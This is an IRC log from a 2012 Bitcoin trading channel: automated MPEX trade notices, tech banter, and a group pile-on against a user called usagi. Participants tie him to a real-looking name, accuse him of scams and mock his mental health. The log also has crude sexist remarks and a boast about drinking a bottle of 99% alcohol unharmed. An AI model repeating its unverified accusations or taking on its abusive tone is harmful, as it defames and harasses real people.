BTC [+] Nov 16 10:17:59 [MPEX] [S.MPOE] 5242 @ 0.00049369 = 2.5879 BTC [+] Nov 16 10:18:03 "Have you started lecturing them yet, about something you just learned Nov 16 10:18:03 about yourself? My money is on "yes"." Nov 16 10:18:05 ahahahaha Nov 16 10:18:16 the ito integration expert Nov 16 10:25:42 https://www.google.com/search?q=usagi+%22Oliver+Richman%22 enjoy Nov 16 10:27:06 [MPEX] [S.MPOE] 36900 @ 0.00049369 = 18.2172 BTC [+] Nov 16 10:36:33 [MPEX] [S.MPOE] 1496 @ 0.00049369 = 0.7386 BTC [+] Nov 16 10:36:35 [MPEX] [S.MPOE] 17600 @ 0.00049378 = 8.6905 BTC [+] Nov 16 10:36:36 [MPEX] [S.MPOE] 16300 @ 0.00049382 = 8.0493 BTC [+] Nov 16 10:36:37 [MPEX] [S.MPOE] 6404 @ 0.00049387 = 3.1627 BTC [+] Nov 16 10:46:01 [MPEX] [S.MPOE] 4696 @ 0.00049387 = 2.3192 BTC [+] Nov 16 10:46:03 [MPEX] [S.MPOE] 23700 @ 0.00049396 = 11.7069 BTC [+] Nov 16 10:46:04 [MPEX] [S.MPOE] 21554 @ 0.00049396 = 10.6468 BTC [+] Nov 16 10:54:23 hmm Nov 16 10:54:37 one has to be tight to have songs written about em Nov 16 10:55:11 [MPEX] [S.MPOE] 15096 @ 0.00049396 = 7.4568 BTC [+] Nov 16 10:55:12 [MPEX] [S.MPOE] 16504 @ 0.00049399 = 8.1528 BTC [+] Nov 16 10:57:53 "An imbecile inspired this song with his relentless stupidity and arrogance." Nov 16 11:01:20 who stole usagis meds? I'll send you flowers, if you return him to mental institution Nov 16 11:02:13 i thought flowers were reserved for those who pull off bigger scams Nov 16 11:02:40 one flower from trash? Nov 16 11:02:47 ya srsly, usagi is not yet flower-worthy Nov 16 11:02:57 bigger scams, eh? Nov 16 11:03:00 btw, where is the flowers for pirate thread ? Nov 16 11:03:02 OK, forget it. no flowers Nov 16 11:03:18 DIABLO FOR PRESIDENT Nov 16 11:03:27 \o/ Nov 16 11:03:29 you can be president of vermont. Nov 16 11:03:57 you can be president of the securities section of bitcointalk Nov 16 11:04:18 [MPEX] [S.MPOE] 6596 @ 0.00049399 = 3.2584 BTC [+] Nov 16 11:04:20 [MPEX] [S.MPOE] 24604 @ 0.000494 = 12.1544 BTC [+] Nov 16 11:04:43 no, we need one of the bitcoin-webhores there. Nov 16 11:05:23 and how does that disqualify Diablo-D3 Nov 16 11:05:36 you saw tits ?! Nov 16 11:05:43 oh one of those Nov 16 11:05:50 lol Nov 16 11:05:56 this convo should go in the annals. Nov 16 11:07:53 wait, what? Nov 16 11:08:07 these are not tits, these are manboobs! Nov 16 11:08:15 fear my hairy chest! waagh! Nov 16 11:08:46 i see https://bitcointalk.org/index.php?topic=124441.0 is going nicely Nov 16 11:08:56 why do people hate what they don't know ffs. just learn it! Nov 16 11:09:40 o, this is new https://bitcointalk.org/index.php?topic=124391.0 Nov 16 11:09:47 at least to me. Nov 16 11:10:25 https://bitcointalk.org/index.php?topic=124391.msg1338426#msg1338426 Nov 16 11:10:26 lmao Nov 16 11:10:29 not this shit again dot jpg Nov 16 11:10:56 I agree with that bitcoin business post Nov 16 11:11:06 this is largely a subset of whats already said in the tech startup community Nov 16 11:11:16 no one is going to steal your fucking idea, JustDoIt(tm) Nov 16 11:12:10 d'uh. Nov 16 11:12:35 problem is that a large contingent of new bitcoiners (tm) comes from the internet marketing subculture Nov 16 11:12:45 these are a type of idiots all of their own. like a weird cult. Nov 16 11:13:28 [MPEX] [S.MPOE] 28200 @ 0.000494 = 13.9308 BTC [+] **** BEGIN LOGGING AT Fri Nov 16 11:29:49 2012 Nov 16 11:32:20 [MPEX] [S.MPOE] 4146 @ 0.000494 = 2.0481 BTC [+] Nov 16 11:32:21 [MPEX] [S.MPOE] 14106 @ 0.00049402 = 6.9686 BTC [+] Nov 16 11:32:23 [MPEX] [S.MPOE] 2734 @ 0.00049422 = 1.3512 BTC [+] Nov 16 11:37:28 btw, Rakim should get an imac. Nov 16 11:41:00 i think if rakim had the money for an imac rakim would rent a souped up hummer limo for 24 hours. Nov 16 11:41:37 [MPEX] [S.MPOE] 8616 @ 0.00049422 = 4.2582 BTC [+] Nov 16 11:41:38 [MPEX] [S.MPOE] 22433 @ 0.00049433 = 11.0893 BTC [+] Nov 16 11:43:30 that's racist Nov 16 11:43:43 heh Nov 16 11:43:56 you know Nov 16 11:44:04 I actually wouldnt mind having a retina desktop display Nov 16 11:44:17 I just dont want the goddamned apple look Nov 16 11:44:26 seriously, if its not black, its shit Nov 16 11:44:39 aluminum is just too distracting for daily use Nov 16 11:44:48 or iPlastic look they still retain on some shit Nov 16 11:46:40 yes, the main problem with Apple is color. Nov 16 11:47:13 the secondary problem is price Nov 16 11:47:19 but that actually can be fixed Nov 16 11:47:26 my statement was kinda a joke Nov 16 11:47:36 heh Nov 16 11:47:53 I actually do think thats the problem Nov 16 11:48:03 like, if you're paying that much fucking money, it should come in any fucking color you want Nov 16 11:48:09 and have non-shiney screans Nov 16 11:48:47 you can have sharp/bright screens without going shiney Nov 16 11:48:53 http://de1.eu.apcdn.com/full/88852.jpg Nov 16 11:48:56 NEC does it Nov 16 11:49:05 although they use some fucking expensive polarizer to do it Nov 16 11:49:34 kakobrekla: thats more of a slur against starbucks, really Nov 16 11:50:01 yes, starbucks with apple logo. Nov 16 11:50:27 all the same kind of company Nov 16 11:50:34 best in class not because they're the best but because they say they are Nov 16 11:50:56 best in the class excuse me? Nov 16 11:51:01 if owning an apple and drinking a starbucks was what only the elite did, why does everyone own apple and drink starbucks? Nov 16 11:51:45 seriously, I will never understand PR Nov 16 11:51:49 it doesnt work on me. Nov 16 11:51:54 [MPEX] [S.MPOE] 5067 @ 0.00049433 = 2.5048 BTC [+] Nov 16 11:51:55 [MPEX] [S.MPOE] 8133 @ 0.00049444 = 4.0213 BTC [+] Nov 16 11:51:58 want to impress me? prove you have a better product. Nov 16 11:52:26 apple hasnt done that Nov 16 11:53:10 I mean, I like some of what they've done, they've had a few good ideas Nov 16 11:53:33 bringing multitouch to the desktop, retina screens on the desktop, etc Nov 16 11:53:57 stuff kids would want. Nov 16 11:54:00 but whats the point if it costs that much money and looks ugly and underperforms against every other option Nov 16 11:54:09 and osx is a fucking disaster Nov 16 11:54:17 if there was ever a textbook definition of polishing a turd, osx is it Nov 16 11:55:04 and its kind of sad Nov 16 11:55:10 osx does quite a few things pretty decently Nov 16 11:55:15 the linux desktop wished it looked that good Nov 16 11:55:22 yet guess what? I have a linux desktop Nov 16 11:55:29 it looks like shit, but it gets shit done day in and day out Nov 16 11:55:33 nothing else can claim that Nov 16 12:01:06 [MPEX] [S.MPOE] 18100 @ 0.00049444 = 8.9494 BTC [+] Nov 16 12:07:18 http://trilema.com/2012/icbitse-the-bucket-shop/ <<< pretty big. Nov 16 12:10:15 [MPEX] [S.MPOE] 9033 @ 0.00049444 = 4.4663 BTC [+] Nov 16 12:12:13 >>don’t recall assbot ever streaming a trade from them in #bitcoin-assets, and that happens to be the criteria I use. Nov 16 12:12:21 some shit came flying through my nose. Nov 16 12:12:54 lol ? Nov 16 12:12:59 ;) Nov 16 12:13:04 hehe. well... it is. Nov 16 12:19:45 [MPEX] [S.MPOE] 22715 @ 0.00049444 = 11.2312 BTC [+] Nov 16 12:19:46 good read Nov 16 12:19:46 [MPEX] [S.MPOE] 19635 @ 0.00049444 = 9.7083 BTC [+] Nov 16 12:19:57 hope to see some response from them about this Nov 16 12:21:10 right. Nov 16 12:21:22 pay me a bitcoin for every time fud is mentioned ? Nov 16 12:25:23 hehe Nov 16 12:25:33 no easy money, you know it. Nov 16 12:25:37 ;> Nov 16 12:29:09 [MPEX] [S.MPOE] 12632 @ 0.00049444 = 6.2458 BTC [+] Nov 16 12:29:10 [MPEX] [S.MPOE] 18654 @ 0.00049445 = 9.2235 BTC [+] Nov 16 12:38:39 [MPEX] [S.MPOE] 6346 @ 0.00049445 = 3.1378 BTC [+] Nov 16 12:38:41 [MPEX] [S.MPOE] 11776 @ 0.00049457 = 5.8241 BTC [+] Nov 16 12:38:42 [MPEX] [S.MPOE] 17200 @ 0.00049459 = 8.5069 BTC [+] Nov 16 12:38:44 [MPEX] [S.MPOE] 15188 @ 0.00049461 = 7.5121 BTC [+] Nov 16 12:45:00 awww Nov 16 12:48:01 [MPEX] [S.MPOE] 17312 @ 0.00049461 = 8.5627 BTC [+] Nov 16 12:48:03 [MPEX] [S.MPOE] 12336 @ 0.00049495 = 6.1057 BTC [+] Nov 16 12:57:44 [MPEX] [S.MPOE] 7688 @ 0.00049495 = 3.8052 BTC [+] Nov 16 12:57:46 [MPEX] [S.MPOE] 7712 @ 0.00049502 = 3.8176 BTC [+] Nov 16 13:00:31 Diablo-D3: what desktop you use? (Diablo-D3 | it looks like shit) Nov 16 13:01:06 xfce Nov 16 13:02:15 "The fatal dose of pure alcohol in an average adult is 300-400 mL (750-1000 mL of 40% alcohol) if consumed in less than one hour. Nov 16 13:02:33 this is such bs. i ocasionalyl drink triple distilled alcohol (99%) Nov 16 13:02:41 i've went through one bottle in a day, im quite not dead. Nov 16 13:02:57 thats an LD50 Nov 16 13:03:07 it only kills half the people Nov 16 13:03:19 mircea_popescu: and notice that said less than one hour Nov 16 13:03:23 24 > 1 Nov 16 13:03:39 they also said 300-400ml Nov 16 13:04:02 but yea, i guess you have a point. Nov 16 13:07:06 [MPEX] [S.MPOE] 30388 @ 0.00049502 = 15.0427 BTC [+] Nov 16 13:07:08 [MPEX] [S.MPOE] 3212 @ 0.00049515 = 1.5904 BTC [+] Nov 16 13:10:01 Who ever assigns scammer tags, better step up and do his fkn job. Usagi needs a tag so bad, it reeks. Nov 16 13:10:33 And while you are at it, restore all his posts, he has managed to delete Nov 16 13:10:36 the entire scammer tag thing is a dubious fix for a large problem Nov 16 13:10:45 and i think soon enough the forum might take them out altogether. Nov 16 13:11:06 correct, it's not even a fkn bandaid Nov 16 13:12:14 but why do we need moderators, if they are not closing down even obvious scam threads? Nov 16 13:13:36 well, i don't know that we need them, but in principle this is like saying why do you even have waitresses if they don't even suck your cock Nov 16 13:14:14 ? Nov 16 13:14:42 maybe they have mods to keep anyoen from posting the letter W Nov 16 13:14:52 i mean... there's a ton of reasons to have mods. Nov 16 13:15:00 mircea_popescu: are you drunk? Nov 16 13:15:07 not atm. Nov 16 13:15:59 but srsly, do you understand the breadth of the task of closing down scam threads ? Nov 16 13:16:09 [MPEX] [S.MPOE] 12600 @ 0.00049515 = 6.2389 BTC [+] Nov 16 13:24:10 mircea_popescu: after you" Nov 16 13:24:23 hm ? Nov 16 13:24:46 mircea_popescu: after your "... why do you even have waitresses if they don't even suck your cock..." comparison I think you do not understand it :) Nov 16 13:24:59 lol i see Nov 16 13:25:23 what's the problem ? cocksucking is a valuable service, the girls are hired to serve the customer, why shouldn't they ? Nov 16 13:25:28 [MPEX] [S.MPOE] 20938 @ 0.00049515 = 10.3675 BTC [+] Nov 16 13:25:29 [MPEX] [S.MPOE] 18312 @ 0.00049517 = 9.0676 BTC [+] Nov 16 13:25:38 o, cause it's a lot of work, requires a lot of skill, most girls aren't prepared to handle it etc ? Nov 16 13:25:39 awell. Nov 16 13:27:40 mircea_popescu: I have no good recommendations for you how you can get over your serious sexual problems and obvious insecurities. Maybe you need to get some help from professional? Nov 16 13:28:11 wait. obvious insecurities cause i discuss sex ? Nov 16 13:28:48 no, it not so much that you do talk about it but how you talk about it Nov 16 13:29:38 how's that ? Nov 16 13:31:09 sometimes try reading the stuff you write when women or sex is involved. :) Nov 16 13:31:28 did someone say women? Nov 16 13:31:52 Diablo-D3 has a alert set on "women" :) Nov 16 13:32:10 no, just trolling Nov 16 13:32:26 lol Nov 16 13:32:33 EskimoBob i reread my stuff all the time, i'm like my own favourite author. Nov 16 13:33:42 Diablo-D3: can you kick your pompous comrades ass (other forum admins) and restore usagi's deleted posts - history needs this Nov 16 13:34:09 mircea_popescu: good for you. Nov 16 13:34:24 EskimoBob: I dont think they can be restored Nov 16 13:34:31 fuuuuuuccckk! Nov 16 13:34:34 [MPEX] [S.MPOE] 8838 @ 0.00049517 = 4.3763 BTC [+] Nov 16 13:34:35 [MPEX] [S.MPOE] 22462 @ 0.00049517 = 11.1225 BTC [+] Nov 16 13:34:57 I dont know how the software works, but I assume it deletes it from the SQL DB backend instead of puts it in a trash can db Nov 16 13:35:07 (or a deleted column, etc etc) Nov 16 13:35:19 maybe it adds some "do not display" bit? Nov 16 13:35:31 like I said, deleted column Nov 16 13:36:07 deleted column? Every post is a column? Nov 16 13:36:16 how about row? Nov 16 13:36:24 || column Nov 16 13:36:35 - row Nov 16 13:36:39 no, every post is a row Nov 16 13:36:50 tables have columns and rows Nov 16 13:36:57 doh... really Nov 16 13:37:26 so you'd have something like unique id, subject, body, user id, timestamp, etc etc Nov 16 13:37:33 and each post is a tuplet of those Nov 16 13:39:12 wtf is SuprTiggr and why it reacts to '|' as a start of a command Nov 16 13:39:30 | stop Nov 16 13:43:37 [MPEX] [S.MPOE] 27438 @ 0.00049517 = 13.5865 BTC [+] Nov 16 13:43:38 [MPEX] [S.MPOE] 20962 @ 0.00049518 = 10.38 BTC [+] Nov 16 13:44:09 SuprTiggr does the net chart Nov 16 13:46:18 it's The current (running) version of this Supybot is 0.83.4.1. The newest version available online is 0.83.4.1. Nov 16 13:47:17 it's MrTiggr's bot. Nov 16 13:47:28 i think it does something related to bitcoin-police. Nov 16 13:55:02 [MPEX] [S.MPOE] 226 @ 0.00049518 = 0.1119 BTC [+] Nov 16 13:55:04 [MPEX] [S.MPOE] 28649 @ 0.00049536 = 14.1916 BTC [+] Nov 16 13:55:05 [MPEX] [S.MPOE] 16250 @ 0.00049537 = 8.0498 BTC [+] Nov 16 13:55:06 [MPEX] [S.MPOE] 3825 @ 0.0004954 = 1.8949 BTC [+] Nov 16 14:05:09 [MPEX] [S.MPOE] 37512 @ 0.0004954 = 18.5834 BTC [+] Nov 16 14:14:18 [MPEX] [S.MPOE] 2813 @ 0.0004954 = 1.3936 BTC [+] Nov 16 14:14:19 [MPEX] [S.MPOE] 21086 @ 0.00049542 = 10.4464 BTC [+] Nov 16 14:23:20 [MPEX] [S.MPOE] 23627 @ 0.00049542 = 11.7053 BTC [+] Nov 16 14:23:22 [MPEX] [S.MPOE] 13140 @ 0.00049549 = 6.5107 BTC [+] Nov 16 14:31:43 This is a public notice that I have resigned from all my roles in Bitcoin Magazine today and from position of a Director of Bittalk Media Ltd. Nov 16 14:31:48 is there anyone left @bitcoin mag ? Nov 16 14:32:48 [MPEX] [S.MPOE] 22760 @ 0.00049549 = 11.2774 BTC [+] Nov 16 14:32:50 [MPEX] [S.MPOE] 9871 @ 0.0004955 = 4.8911 BTC [+] Nov 16 14:33:15 who was that from? vlad? Nov 16 14:33:41 bitcoin mag was a fail idea to start with... Nov 16 14:34:34 ? Nov 16 14:34:42 ya vladimir quit Nov 16 14:34:50 leaving just this one romanian dood there. Nov 16 14:35:21 http://trilema.com/2012/ciuciu-bond/#comment-87622 << that's him Nov 16 14:37:47 "mircea_popescu | This is a public notice---" where do you read that? Nov 16 14:37:52 forum? Nov 16 14:38:01 well i get a forum digest Nov 16 14:38:05 do you want the actual link ? Nov 16 14:38:20 if you have it Nov 16 14:38:36 UI got it Nov 16 14:41:04 publishing a magazine is loads of fun if you have a good team Nov 16 14:42:07 and subject you love. Nov 16 14:42:26 [MPEX] [S.MPOE] 14379 @ 0.0004955 = 7.1248 BTC [+] Nov 16 14:42:28 [MPEX] [S.MPOE] 30850 @ 0.00049556 = 15.288 BTC [+] Nov 16 14:42:29 [MPEX] [S.MPOE] 7871 @ 0.00049568 = 3.9015 BTC [+] Nov 16 14:42:40 yeah, cause in general it's a pretty decent pickup line Nov 16 14:42:53 so you can fill an office up with confused twenty somethings that can't do math too well. Nov 16 14:43:56 I did run a magazine for few years Nov 16 14:52:21 [MPEX] [S.MPOE] 17129 @ 0.00049568 = 8.4905 BTC [+] Nov 16 14:52:22 [MPEX] [S.MPOE] 28871 @ 0.00049571 = 14.3116 BTC [+] Nov 16 14:57:05 girls only you gourd you Nov 16 14:57:12 oh okay Nov 16 15:01:49 [MPEX] [S.MPOE] 51600 @ 0.00049571 = 25.5786 BTC [+] Nov 16 15:01:50 [MPEX] [S.MPOE] 4400 @ 0.00049571 = 2.1811 BTC [+] Nov 16 15:10:53 [MPEX] [S.MPOE] 3529 @ 0.00049571 = 1.7494 BTC [+] Nov 16 15:10:55 [MPEX] [S.MPOE] 19071 @ 0.00049573 = 9.4541 BTC [+] Nov 16 15:20:17 [MPEX] [S.MPOE] 32500 @ 0.00049573 = 16.1112 BTC [+] Nov 16 15:25:49 usagi is back Nov 16 15:25:50 https://bitcointalk.org/index.php?topic=124391.0 Nov 16 15:27:48 lol Nov 16 15:27:59 what timing Nov 16 15:29:29 [MPEX] [S.MPOE] 14748 @ 0.00049573 = 7.311 BTC [+] Nov 16 15:29:30 [MPEX] [S.MPOE] 19162 @ 0.00049573 = 9.4992 BTC [+] Nov 16 15:29:47 https://bitcointalk.org/index.php?topic=124391.msg1338729#msg1338729 Nov 16 15:29:52 that's pretty damning Nov 16 15:29:59 i don't recall bb saying "fuck" Nov 16 15:32:50 just when i thought things were beginning to calm down.... Nov 16 15:33:05 i do think badbear is a dick.. i never liked him:/ Nov 16 15:33:27 https://bitcointalk.org/index.php?topic=124482.msg1338773#msg1338773 Nov 16 15:33:31 that's pretty funny Nov 16 15:33:54 lol Nov 16 15:34:13 wordpress taking btc is massive Nov 16 15:34:20 if only we could get others to join Nov 16 15:34:37 yeah Nov 16 15:37:25 yeah but not on the forum, i got perma banned Nov 16 15:37:32 not sure if you knew or not Nov 16 15:37:57 :) Nov 16 15:38:44 [MPEX] [S.MPOE] 10638 @ 0.00049573 = 5.2736 BTC [+] Nov 16 15:38:46 [MPEX] [S.MPOE] 25547 @ 0.00049577 = 12.6654 BTC [+] Nov 16 15:48:02 [MPEX] [S.MPOE] 11200 @ 0.00049577 = 5.5526 BTC [+] Nov 16 15:48:21 http://alfixturedesign.com/420/BJ.gif hahaha Nov 16 15:49:56 speaking of waitresses :) Nov 16 15:50:00 ;;ticker Nov 16 15:50:03 BTCUSD ticker | Best bid: 11.50406, Best ask: 11.56866, Bid-ask spread: 0.06460, Last trade: 11.60000, 24 hour volume: 57628.92532269, 24 hour low: 10.86000, 24 hour high: 11.60000, 24 hour vwap: 11.27755 Nov 16 15:50:10 over .5 Nov 16 15:55:04 >>Alberto's explanations of the situation aren't very convincing, but I'm giving him until early December to come up with some form of payment. I'm also exploring legal, law enforcement and other possibilities for escalating this in case this fails. Nov 16 15:55:10 nothing will come out of this Nov 16 15:55:15 just like pirate Nov 16 15:56:48 is this meni ? Nov 16 15:57:15 [MPEX] [S.MPOE] 1551 @ 0.00049577 = 0.7689 BTC [+] Nov 16 15:57:17 [MPEX] [S.MPOE] 27500 @ 0.00049583 = 13.6353 BTC [+] Nov 16 15:57:18 [MPEX] [S.MPOE] 8758 @ 0.00049584 = 4.3426 BTC [+] Nov 16 16:03:27 LOL, look who has crawled out out of his hole Nov 16 16:03:43 it's the famous nuter usagi... LOL Nov 16 16:04:33 I do not care. But probably in madhouse Nov 16 16:05:12 it was nice without you, you ling sack of shit. Go troll some other channel Nov 16 16:05:45 I was told you spent your time in your local madhouse. Nov 16 16:06:01 Looks like they let you out and this is not good for BTC community Nov 16 16:06:36 I guess you spent your last month deleting your posts from the forum Nov 16 16:06:56 [MPEX] [S.MPOE] 39242 @ 0.00049584 = 19.4578 BTC [+] Nov 16 16:06:58 [MPEX] [S.MPOE] 17650 @ 0.00049591 = 8.7528 BTC [+] Nov 16 16:06:59 [MPEX] [S.MPOE] 708 @ 0.00049593 = 0.3511 BTC [+] Nov 16 16:07:06 I do not have to guess. Nov 16 16:07:43 ? Nov 16 16:07:53 take your meds usagi Nov 16 16:09:51 why don't you sing to us, Oliver? LOL Nov 16 16:09:58 why all the drama Nov 16 16:10:29 kongzi.ca ? your new scam? How is nyancat and all that other shit doing? Nov 16 16:12:09 usagi are you trying to do anything to get the asset holder information? Nov 16 16:12:35 anything else? Nov 16 16:13:07 usagi it's in your best interest to make a good faith effort to retrieve the asset holder information Nov 16 16:13:28 "good faith" being one of those words lawyers like to use Nov 16 16:14:15 http://www.soundclick.com/bands/page_songInfo.cfm?bandID=24002&songID=243091 "This one goes out to the delusional Canadian wanker named Oliver Richman. We know we can't fool one such as he with our happy wanderings, because HE knows the Tao (chuckle)." Nov 16 16:14:23 you'd be wise to discuss that with your lawyer Nov 16 16:14:39 Oliver Richman is usagi :) Nov 16 16:14:51 long time troll Nov 16 16:16:37 [MPEX] [S.MPOE] 24292 @ 0.00049593 = 12.0471 BTC [+] Nov 16 16:16:38 [MPEX] [S.MPOE] 17050 @ 0.00049595 = 8.4559 BTC [+] Nov 16 16:16:40 [MPEX] [S.MPOE] 4808 @ 0.00049599 = 2.3847 BTC [+] Nov 16 16:18:25 usagi: where did you hear that nefario has been sending out info? Nov 16 16:19:01 i think usagi is delusional Nov 16 16:19:49 usagi some coins were sent out Nov 16 16:19:52 no info Nov 16 16:20:21 usagi why did you delete all of your posts? Nov 16 16:21:08 you didn't delete any of your posts? Nov 16 16:21:33 why delete them? Nov 16 16:22:43 that doesn't make any sense Nov 16 16:23:08 please do Nov 16 16:23:24 if bitcointalk is so bad, why are you making another proposal on it? Nov 16 16:25:33 but you are trying to raise capital Nov 16 16:25:45 not just offering the service Nov 16 16:25:53 so you are offering a security Nov 16 16:26:21 [MPEX] [S.MPOE] 14750 @ 0.00049599 = 7.3159 BTC [+] Nov 16 16:26:53 so you are not offering ownership in the company? Nov 16 16:27:18 most information marketing businesses need to give a lot of stuff away for free to attract customers Nov 16 16:27:34 or give the apperance that they are giving information away Nov 16 16:28:02 everyone thinks they are special and what they are doing is special Nov 16 16:28:21 maybe you focus on that Nov 16 16:32:27 ok take it to #bitcoin-languages Nov 16 16:33:05 you forgot to mention your deep knowledge of Tao Nov 16 16:33:06 no thanks Nov 16 16:34:57 friend for life? Nov 16 16:35:09 like NYAN* and all the other crap you sold? Nov 16 16:35:34 [MPEX] [S.MPOE] 10699 @ 0.00049599 = 5.3066 BTC [+] Nov 16 16:35:35 [MPEX] [S.MPOE] 26751 @ 0.00049599 = 13.2682 BTC [+] Nov 16 16:44:40 you owe me about 86.87 BTC Nov 16 16:44:44 [MPEX] [S.MPOE] 9676 @ 0.00049599 = 4.7992 BTC [+] Nov 16 16:44:45 [MPEX] [S.MPOE] 2224 @ 0.00049601 = 1.1031 BTC [+] Nov 16 16:48:34 send the coin you wow me to 1KKXSed3ePq6FhUu52zSLR22v8V9v3jQik Nov 16 16:48:54 and you can have your shares back Nov 16 16:49:15 my word is my proof Nov 16 16:50:07 I am not a thieve nor dishonest and you know that Nov 16 16:50:44 usagi You are actually a good example of why this is a bad situation. Without actual codes, people like you bullshit forever and never pay Nov 16 16:51:34 what about the companies insured by your insurance company? Nov 16 16:52:25 yeah but he's working on it Nov 16 16:53:51 [MPEX] [S.MPOE] 29895 @ 0.00049601 = 14.8282 BTC [+] Nov 16 16:53:53 [MPEX] [S.MPOE] 24750 @ 0.00049603 = 12.2767 BTC [+] Nov 16 16:53:53 [MPEX] [S.MPOE] 12805 @ 0.00049606 = 6.352 BTC [+] Nov 16 16:55:34 gigavps is working on what to do right now in the case that has happened where nefario refuses to provide asset info Nov 16 16:55:37 usagi: you little shit swindled a assload of coin from investors and you are too cheap to call James? WTF!? Nov 16 16:56:14 no i dont think you'd be rich with your OBSI.HYPT Nov 16 16:56:52 you pissed away 7500 BTC (or was is closer to 8K). Cancel the fkn rig orders Nov 16 16:57:11 and start paying back the coin Nov 16 16:58:03 do not tell me asshat you have no coin. Nov 16 16:58:46 are you telling me you never preordered those rigs you had in your spreadsheets? Nov 16 16:59:05 what rigs? Nov 16 16:59:15 yes those Nov 16 16:59:31 prove it Nov 16 16:59:55 yes asshole, you do have to prove it Nov 16 17:00:24 EskimoBob: you're not a shareholder in Fantasy Bullshit, Inc Nov 16 17:00:26 so no, he doesnt have to prove it Nov 16 17:03:13 [MPEX] [S.MPOE] 23445 @ 0.00049606 = 11.6301 BTC [+] Nov 16 17:03:13 [MPEX] [S.MPOE] 14855 @ 0.00049608 = 7.3693 BTC [+] Nov 16 17:03:52 lol Nov 16 17:09:40 usagi you claim such great things, yet smickles was very displeased with how you went about repaying him. he said to never do business with you, and he would personally never do business with you again. Nov 16 17:12:26 man Nov 16 17:12:35 I wonder if anyone is going to upload a camrip of eva 3.0 Nov 16 17:12:35 [MPEX] [S.MPOE] 11700 @ 0.00049608 = 5.8041 BTC [+] Nov 16 17:12:43 smickles is highly regarded Nov 16 17:12:59 why should i not trust what he says? Nov 16 17:14:27 thestringpuller: trolling and bullshitting in the internet is nothing new to usagi. Hes experience is probably over 10 year Nov 16 17:14:54 he used to do similar shit in other forums Nov 16 17:15:15 https://www.google.com/search?q=usagi+%22Oliver+Richman%22 enjoy Nov 16 17:15:21 so this is all one big conspiracy? Nov 16 17:15:34 everyone is rigging the game against usagi? Nov 16 17:15:38 only good thing you or anyone else can do is just ignore that scumbag Nov 16 17:17:20 did, usagi. did Nov 16 17:17:51 and after you lost 7.5K of investors coin... Nov 16 17:18:21 look who rated me with -, you stupid little man :) Nov 16 17:18:36 did I ? Nov 16 17:18:44 you really want to start that shit again? Nov 16 17:19:08 go read the scam thread you posted and stfu. you lost Nov 16 17:19:51 there is a saying in the orient Nov 16 17:20:00 loyalty to the end Nov 16 17:20:05 go waste it somewhere else usagi, please! Nov 16 17:20:56 i believe in those who believe in me Nov 16 17:21:05 i believe in crystal light Nov 16 17:21:08 i trust smickles who i am loyal to Nov 16 17:21:20 because he has been good to me Nov 16 17:21:30 all i see here is you igniting flames Nov 16 17:21:47 [MPEX] [S.MPOE] 18895 @ 0.00049608 = 9.3734 BTC [+] Nov 16 17:21:48 [MPEX] [S.MPOE] 18105 @ 0.00049609 = 8.9817 BTC [+] Nov 16 17:22:09 its offtopic here usagi Nov 16 17:22:25 don't taze me Nov 16 17:22:38 usagi: longer than you Nov 16 17:22:45 duolingo will be the next big language space Nov 16 17:23:02 that's cause kako is a huge pussy Nov 16 17:23:53 only thing on topic about it is that people are upset with you when you tried to run some bitcoin assets Nov 16 17:24:12 which seems to be a motif Nov 16 17:24:21 the motif that motifates me Nov 16 17:24:23 so who are these people so pleased with your work? Nov 16 17:24:35 i am merely a skeptic searching for the truth Nov 16 17:24:57 i'm not gonna /ignore, im just gonna change the channel Nov 16 17:25:03 "is this your homework larry" Nov 16 17:26:57 THIS IS WHAT HAPPENS LARRY Nov 16 17:27:07 :) Nov 16 17:27:12 haha Nov 16 17:27:18 my day is made Nov 16 17:27:28 the truth about the aliens Nov 16 17:27:35 is that where the money went? Nov 16 17:31:12 もちろん Nov 16 17:32:50 [MPEX] [S.MPOE] 8800 @ 0.00049603 = 4.3651 BTC [-] Nov 16 17:32:51 [MPEX] [S.MPOE] 11150 @ 0.00049609 = 5.5314 BTC [+] Nov 16 17:33:37 16:23.10 ( copumpkin ) that's cause kako is a huge pussy <- see that is exactly why i didnt give you op privilege, nano on the other hand got it. Nov 16 17:34:57 lol Nov 16 17:35:13 I'm not much of a hardass Nov 16 17:35:28 well i guess you would have banned usagi already Nov 16 17:35:34 and others ? Nov 16 17:35:39 nah Nov 16 17:35:43 I'm not much of a banner Nov 16 17:36:40 so how am i a pussy again then? Nov 16 17:36:51 kakobrekla: oh, you just are Nov 16 17:37:11 usagi: I'd probably fail it :) I haven't spoken japanese in 6 years now, and just remember random shit Nov 16 17:37:40 to me it looks like you are the pussy who cant handle usagi Nov 16 17:37:45 watashiwa nihongo ga wakarimasen :< Nov 16 17:38:11 kakobrekla: why would I need to "handle" usagi? Nov 16 17:38:20 even if I were an op :P Nov 16 17:38:28 have we even confirmed usagi has a handle? Nov 16 17:39:26 ... what are your ears doing down there? Nov 16 17:40:26 yes, Im aware of what usagi means, but that doesnt answer the question Nov 16 17:40:35 what is the problem then copumpkin? Nov 16 17:40:39 so unless you seriously have your head up your ass... Nov 16 17:40:41 no problem! Nov 16 17:40:51 k Nov 16 17:41:12 usagi: explain to me something Nov 16 17:41:27 to me, pussy is a compliment Nov 16 17:41:33 I consider myself a pussy too Nov 16 17:41:38 to me its something id fuck. Nov 16 17:41:40 why the fuck did strike witches marry the eternal loli panty shot to semi-accurate WW2 trivia. Nov 16 17:41:53 kakobrekla: presumably that's a good thing Nov 16 17:42:05 arite. Nov 16 17:42:13 usagi: you're kidding me. Nov 16 17:42:14 [MPEX] [S.MPOE] 17345 @ 0.00049609 = 8.6047 BTC [+] Nov 16 17:42:15 [MPEX] [S.MPOE] 7755 @ 0.00049612 = 3.8474 BTC [+] Nov 16 17:42:20 go away kid, you bother me. Nov 16 17:42:48 mmmm project a-ko Nov 16 17:42:56 so, RIP twinkies? Nov 16 17:43:08 copumpkin: rip twinkies Nov 16 17:43:12 time to destroy unions Nov 16 17:43:25 twinkIe twinkIe little star Nov 16 17:43:31 get it? get it? Nov 16 17:43:34 usagi: also, no gits? Nov 16 17:43:40 I used an uppercase I and exploited shitty fonts Nov 16 17:44:07 usagi: but no gits?! Nov 16 17:44:09 wtf man Nov 16 17:44:13 git init Nov 16 17:44:27 git add HAHAIMINURHISTORY Nov 16 17:44:30 git commit -m "HAHA" Nov 16 17:44:36 rebase Nov 16 17:44:36 oh wait, I forgot -a! Nov 16 17:44:46 copumpkin: fail! Nov 16 17:44:54 mmm creamy mami Nov 16 17:44:54 too much mercurial these days at work Nov 16 17:44:55 usagi: you pervert. Nov 16 17:45:10 copumpkin: fuck ALL the mercurials Nov 16 17:45:12 